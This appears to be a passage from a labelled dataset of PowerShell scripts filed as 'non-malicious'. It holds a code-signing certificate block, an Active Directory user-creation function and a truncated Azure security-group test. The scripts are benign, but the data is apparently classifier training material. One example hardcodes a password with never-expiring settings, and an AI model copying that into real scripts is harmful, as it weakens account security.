# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIEHOpS4PVWQ4xDWsPnAdhUv3
# vLqFisNS08JVRFuwDELWMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAoWK1XBHeHbktrIBees3mGj1ldOVFIoP6C2VIy1TEf2xzdb88/9VA66pF
# zmpZ3tCWFB5RbpNvsYXM6sRvtmXoxq22ARSAX8L6XwNxHh1q0mZ7nQFg1pwgdoJo
# b/5blfHYqMi3dPNEfhCONWukSPrYqYE688myGCJeh2PPfhi/Xjhoq0Ly+oBuYPix
# uFR2MbwO8ivUxlqCuBXr2QRPuuMRPUzMYr5jKwF15TQT4ErnazITOQ5qi5DvC6q9
# /S/wSrqvmPFrhBlL61JS8+bkZT0JMqpFyCEwe9ws3GfOC7/InYuxjtPj+efAi/Mv
# HEoq8D5SGo8rJk4Prgh2eTix55kJlaGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC
# FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq
# hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCAuwH0Zuaonz133Olu0W4uFAF8sKLSOoweP73/DL1C0BQIGZpfQk26i
# GBMyMDI0MDczMTA3MDA0Mi4zODRaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO
# OkZDNDEtNEJENC1EMjIwMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT
# ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHimZmV8dzjIOsAAQAAAeIwDQYJ
# KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx
# MDEyMTkwNzI1WhcNMjUwMTEwMTkwNzI1WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl
# cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpGQzQxLTRC
# RDQtRDIyMDElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC
# AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALVjtZhV+kFmb8cKQpg2mzis
# DlRI978Gb2amGvbAmCd04JVGeTe/QGzM8KbQrMDol7DC7jS03JkcrPsWi9WpVwsI
# ckRQ8AkX1idBG9HhyCspAavfuvz55khl7brPQx7H99UJbsE3wMmpmJasPWpgF05z
# ZlvpWQDULDcIYyl5lXI4HVZ5N6MSxWO8zwWr4r9xkMmUXs7ICxDJr5a39SSePAJR
# IyznaIc0WzZ6MFcTRzLLNyPBE4KrVv1LFd96FNxAzwnetSePg88EmRezr2T3HTFE
# lneJXyQYd6YQ7eCIc7yllWoY03CEg9ghorp9qUKcBUfFcS4XElf3GSERnlzJsK7s
# /ZGPU4daHT2jWGoYha2QCOmkgjOmBFCqQFFwFmsPrZj4eQszYxq4c4HqPnUu4hT4
# aqpvUZ3qIOXbdyU42pNL93cn0rPTTleOUsOQbgvlRdthFCBepxfb6nbsp3fcZaPB
# fTbtXVa8nLQuMCBqyfsebuqnbwj+lHQfqKpivpyd7KCWACoj78XUwYqy1HyYnStT
# me4T9vK6u2O/KThfROeJHiSg44ymFj+34IcFEhPogaKvNNsTVm4QbqphCyknrwBy
# qorBCLH6bllRtJMJwmu7GRdTQsIx2HMKqphEtpSm1z3ufASdPrgPhsQIRFkHZGui
# hL1Jjj4Lu3CbAmha0lOrAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQURIQOEdq+7Qds
# lptJiCRNpXgJ2gUwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD
# VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j
# cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG
# CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw
# MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD
# CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAORURDGrVRTbnulf
# sg2cTsyyh7YXvhVU7NZMkITAQYsFEPVgvSviCylr5ap3ka76Yz0t/6lxuczI6w7t
# Xq8n4WxUUgcj5wAhnNorhnD8ljYqbck37fggYK3+wEwLhP1PGC5tvXK0xYomU1nU
# +lXOy9ZRnShI/HZdFrw2srgtsbWow9OMuADS5lg7okrXa2daCOGnxuaD1IO+65E7
# qv2O0W0sGj7AWdOjNdpexPrspL2KEcOMeJVmkk/O0ganhFzzHAnWjtNWneU11WQ6
# Bxv8OpN1fY9wzQoiycgvOOJM93od55EGeXxfF8bofLVlUE3zIikoSed+8s61NDP+
# x9RMya2mwK/Ys1xdvDlZTHndIKssfmu3vu/a+BFf2uIoycVTvBQpv/drRJD68eo4
# 01mkCRFkmy/+BmQlRrx2rapqAu5k0Nev+iUdBUKmX/iOaKZ75vuQg7hCiBA5xIm5
# ZIXDSlX47wwFar3/BgTwntMq9ra6QRAeS/o/uYWkmvqvE8Aq38QmKgTiBnWSS/uV
# PcaHEyArnyFh5G+qeCGmL44MfEnFEhxc3saPmXhe6MhSgCIGJUZDA7336nQD8fn4
# y6534Lel+LuT5F5bFt0mLwd+H5GxGzObZmm/c3pEWtHv1ug7dS/Dfrcd1sn2E4gk
# 4W1L1jdRBbK9xwkMmwY+CHZeMSvBMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ
# mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh
# dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1
# WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB
# BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK
# NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg
# fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp
# rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d
# vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9
# 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR
# Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu
# qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO
# ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb
# oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6
# bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t
# AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW
# BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb
# UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz
# aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku
# aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA
# QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2
# VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu
# bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw
# LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93
# d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt
# MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q
# XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6
# U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt
# I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis
# 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp
# kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0
# sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e
# W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ
# sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7
# Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0
# dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ
# tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh
# bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpG
# QzQxLTRCRDQtRDIyMDElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy
# dmljZaIjCgEBMAcGBSsOAwIaAxUAFpuZafp0bnpJdIhfiB1d8pTohm+ggYMwgYCk
# fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF
# AOpUGaQwIhgPMjAyNDA3MzExMDAyMTJaGA8yMDI0MDgwMTEwMDIxMlowdDA6Bgor
# BgEEAYRZCgQBMSwwKjAKAgUA6lQZpAIBADAHAgEAAgIWlDAHAgEAAgISgTAKAgUA
# 6lVrJAIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID
# B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAH13cG6kOg3UO4+kLfMr
# dsSkn5Pz4eR228Ukb+ThepXMxdhfLaLWlI2TSEXh+F9+urZXfP+aNzShsT9gjeBi
# tY5UifJICrbNx2veSOtxZsf8VP64mbx6Em4qwIBnX5HlxQZmfQG9Y0MW/T33Q7XC
# +cS6+Mygpd5fvKJkPv3PEcVSMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt
# U3RhbXAgUENBIDIwMTACEzMAAAHimZmV8dzjIOsAAQAAAeIwDQYJYIZIAWUDBAIB
# BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx
# IgQgseBokCbeoUpkNtf+0kulVQorc474HtdhKzlHbPOO22wwgfoGCyqGSIb3DQEJ
# EAIvMYHqMIHnMIHkMIG9BCAriSpKEP0muMbBUETODoL4d5LU6I/bjucIZkOJCI9/
# /zCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB4pmZ
# lfHc4yDrAAEAAAHiMCIEIGLRjvCM29kcWgfIUg/K2HwPYCHanWybsnAUWWPRQoWm
# MA0GCSqGSIb3DQEBCwUABIICAA9i7rVQuupOUH4LwLFPrwyeTBkENV4CzH1cee6L
# GoJZ1AKXUxfDYPbcYhDfBbJT+7DfqXVnwBYj1SAgn5X8vq/9nbGwrJHYddzLrOuu
# WLVZYQNrpSvIIauC4LHpVyFW5mgSzhix8E2BGmB1XQK8zBxJkDdRCzu1STurfXKx
# YJm91XjzbOjI+Ym7rigtAaWy6tVhsprWOPyV5XSahLIpTqyDavxnjlGg4yQvHKnH
# jRws0qdAs5nHimbzE/wjIAEh9uNyOsqACwDK4kKduCQDZuyUkkqr0/v2N0zlCTNw
# 6jgnERotlL72czsfbM9+KiC44KPSQiMHQoHviXc9fsfwK9qQ8srcdcvm/VeWMpFU
# 7U6xvsVZ8fMsFqda9A6qV+BuR9YoTtm6NM9lgM/OQ9mGW0PgY5akWSXUtJ5ZgozC
# X+IyfocX1qQsD3MfPNnjfy5OtqQmc4p8//ZbRcszeHoVlidPyc8BmaLzCzcdZJSU
# xK9Ejt0KaMvHMmZvawjLXc7AEj1P0lY99c332waOZkZlPp6LXW1ItlG/ZzD/n94t
# IsARHNBDwzTQT+SeRW73GwKPs4tBZIfLieesTmvwJeXd3lvrNtAPQ+wtdzGmSWT2
# SgnHenro24No47gEguKFi0lV+trO3atrvUpiVsIvEHd7sIYNZwVdH1YCByOMz4RW
# 6WSc
# SIG # End signature block
|
combined_dataset/train/non-malicious/New-AdUser.ps1
|
New-AdUser.ps1
|
function New-AdUser {
param (
[string] $Username = $(throw "Parameter -Username [System.String] is required."),
[string] $Password = $(throw "Parameter -Password [System.String] is required."),
[string] $OrganizationalUnit = "Users",
[string] $DisplayName,
[string] $FirstName,
[string] $LastName,
[string] $Initials,
[string] $Description,
[switch] $CannotChangePassword,
[switch] $PasswordNeverExpires,
[switch] $Disabled
)
try {
$currentDomain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$dn = $currentDomain.GetDirectoryEntry().distinguishedName
$ou = [ADSI] "LDAP://CN=$OrganizationalUnit,$dn"
$userAccount = $ou.Create("user", "cn=$Username")
$userAccount.SetInfo()
$userAccount.userAccountControl = ($userAccount.userAccountControl.Item(0) -bxor 0x0002) #Enable the account
$userAccount.SetInfo()
# Properties
$userAccount.sAMAccountName = $Username
$userAccount.SetInfo()
$userAccount.userPrincipalName = ("{0}@{1}" -f $Username, $currentDomain.Name)
if ($DisplayName) {
$userAccount.displayName = $DisplayName
}
if ($Description) {
$userAccount.description = $Description
}
if ($FirstName) {
$userAccount.givenname = $FirstName
}
if ($LastName) {
$userAccount.sn = $LastName
}
if ($Initials) {
$userAccount.initials = $Initials
}
$userAccount.SetInfo()
$userAccount.SetPassword($Password)
# Password
if ($PasswordNeverExpires) {
$userAccount.userAccountControl = ($userAccount.userAccountControl.Item(0) -bxor 0x10000)
}
if ($CannotChangePassword) {
$everyOne = [System.Security.Principal.SecurityIdentifier]'S-1-1-0'
$EveryoneDeny = new-object System.DirectoryServices.ActiveDirectoryAccessRule ($Everyone,'ExtendedRight','Deny', [System.Guid]'ab721a53-1e2f-11d0-9819-00aa0040529b')
$self = [System.Security.Principal.SecurityIdentifier]'S-1-5-10'
$SelfDeny = new-object System.DirectoryServices.ActiveDirectoryAccessRule ($self,'ExtendedRight','Deny', [System.Guid]'ab721a53-1e2f-11d0-9819-00aa0040529b')
$userAccount.get_ObjectSecurity().AddAccessRule($selfDeny)
$userAccount.get_ObjectSecurity().AddAccessRule($EveryoneDeny)
$userAccount.CommitChanges()
}
$userAccount.SetInfo()
if ($Disabled) {
$userAccount.userAccountControl = ($userAccount.userAccountControl.Item(0) -bxor 0x0002)
}
$userAccount.SetInfo()
} catch {
Write-Error $_
#$ou.Delete("user", "cn=$Username")
return $false
}
return $true
}
New-AdUser -Username bob -Password 'B0bsP4$$W0rD!@#$%' -Description "Bob's account" -FirstName Bob -LastName Doe -DisplayName "Bob Doe" -Initials R -PasswordNeverExpires -CannotChangePassword -Disabled
|
combined_dataset/train/non-malicious/3962.ps1
|
3962.ps1
|
function Test-ApplicationSecurityGroupCRUD
{
$rgLocation = Get-ProviderLocation ResourceManagement
$resourceTypeParent = "Microsoft.Network/ApplicationSecurityGroups"
$location = Get-ProviderLocation $resourceTypeParent
$rgName = Get-ResourceGroupName
$asgName = Get-ResourceName
try
{
$resourceGroup = New-AzResourceGroup -Name $rgName -Location $location -Tags @{ testtag = "ASG tag" }
$job = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName -Location $rgLocation -AsJob
$job | Wait-Job
$asgNew = $job | Receive-Job
Assert-AreEqual $rgName $asgNew.ResourceGroupName
Assert-AreEqual $asgName $asgNew.Name
Assert-NotNull $asgNew.Location
Assert-NotNull $asgNew.Etag
$asgGet = Get-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName
Assert-AreEqual $rgName $asgGet.ResourceGroupName
Assert-AreEqual $asgName $asgGet.Name
Assert-NotNull $asgGet.Location
Assert-NotNull $asgGet.Etag
$asgGet = Get-AzApplicationSecurityGroup -ResourceGroupName "*"
Assert-True { $asgGet.Count -ge 0 }
$asgGet = Get-AzApplicationSecurityGroup -Name "*"
Assert-True { $asgGet.Count -ge 0 }
$asgGet = Get-AzApplicationSecurityGroup -ResourceGroupName "*" -Name "*"
Assert-True { $asgGet.Count -ge 0 }
$asgDelete = Remove-AzApplicationSecurityGroup -Name $asgName -ResourceGroupName $rgName -PassThru -Force
Assert-AreEqual $true $asgDelete
}
finally
{
Clean-ResourceGroup $rgName
}
}
function Test-ApplicationSecurityGroupCollections
{
$rgLocation = Get-ProviderLocation ResourceManagement
$resourceTypeParent = "Microsoft.Network/ApplicationSecurityGroups"
$location = Get-ProviderLocation $resourceTypeParent
$rgName1 = Get-ResourceGroupName
$rgName2 = Get-ResourceGroupName
$asgName1 = Get-ResourceName
$asgName2 = Get-ResourceName
try
{
